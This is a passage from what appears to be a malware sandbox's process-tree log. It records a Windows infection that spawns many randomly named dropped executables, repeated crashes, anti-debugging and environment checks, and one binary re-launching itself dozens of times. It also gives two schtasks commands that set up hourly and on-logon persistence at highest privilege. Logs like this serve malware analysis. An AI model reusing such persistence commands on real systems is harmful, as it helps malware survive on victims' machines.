C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o28⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o29⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o30⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o31⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o32⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o33⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o34⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o35⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o36⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o37⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o38⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\2989900.exe"C:\Users\Admin\AppData\Roaming\2989900.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\7580128.exe"C:\Users\Admin\AppData\Roaming\7580128.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2842862.exe"C:\Users\Admin\AppData\Roaming\2842862.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\2206378.exe"C:\Users\Admin\AppData\Roaming\2206378.exe"6⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"5⤵
-
C:\Users\Admin\Documents\ybDkP2sQ6_pLyun1GoApuo9P.exe"C:\Users\Admin\Documents\ybDkP2sQ6_pLyun1GoApuo9P.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 6643⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 6763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 6363⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 6843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 11243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 11043⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 11563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 11683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 12683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4200 -s 12043⤵
- Program crash
-
C:\Users\Admin\Documents\Juy1Klom0iHRt0cpliJhPTvO.exe"C:\Users\Admin\Documents\Juy1Klom0iHRt0cpliJhPTvO.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 6563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 6683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 7163⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 6963⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 11203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 11603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4144 -s 11403⤵
- Program crash
-
C:\Users\Admin\Documents\3CzjcI0lz_q8pGaAxMLxiexU.exe"C:\Users\Admin\Documents\3CzjcI0lz_q8pGaAxMLxiexU.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\3CzjcI0lz_q8pGaAxMLxiexU.exe"C:\Users\Admin\Documents\3CzjcI0lz_q8pGaAxMLxiexU.exe" -u3⤵
-
C:\Users\Admin\Documents\rwtUE2DGUjdKpne200zgB3n4.exe"C:\Users\Admin\Documents\rwtUE2DGUjdKpne200zgB3n4.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\09WJtjb0y0ANJSkCvy24hF8U.exe"C:\Users\Admin\Documents\09WJtjb0y0ANJSkCvy24hF8U.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"3⤵
-
C:\Users\Admin\Documents\S0ZeflJw9QGVH3JMalTExtbh.exe"C:\Users\Admin\Documents\S0ZeflJw9QGVH3JMalTExtbh.exe"4⤵
-
C:\Users\Admin\Documents\Q4Bmrp4t55pJu2jOk89erJj3.exe"C:\Users\Admin\Documents\Q4Bmrp4t55pJu2jOk89erJj3.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\6081357.exe"C:\Users\Admin\AppData\Roaming\6081357.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\5444873.exe"C:\Users\Admin\AppData\Roaming\5444873.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\6561851.exe"C:\Users\Admin\AppData\Roaming\6561851.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\5139526.exe"C:\Users\Admin\AppData\Roaming\5139526.exe"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\B6yowxV8LsKL_sh6fD4dEqTq.exe"C:\Users\Admin\Documents\B6yowxV8LsKL_sh6fD4dEqTq.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6764338.exe"C:\Users\Admin\AppData\Roaming\6764338.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\8719363.exe"C:\Users\Admin\AppData\Roaming\8719363.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\7550179.exe"C:\Users\Admin\AppData\Roaming\7550179.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\5631149.exe"C:\Users\Admin\AppData\Roaming\5631149.exe"3⤵
-
C:\Users\Admin\Documents\Uw2nsLbf3aKDMOvE9SBpKWI8.exe"C:\Users\Admin\Documents\Uw2nsLbf3aKDMOvE9SBpKWI8.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\zUJh9p7ry0bJHslkedqN_gmr.exe"C:\Users\Admin\Documents\zUJh9p7ry0bJHslkedqN_gmr.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 3843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 4323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 4683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 6923⤵
- Program crash
-
C:\Users\Admin\Documents\2dRkySXfpzhrHfXqbMfr2Dh6.exe"C:\Users\Admin\Documents\2dRkySXfpzhrHfXqbMfr2Dh6.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe"C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
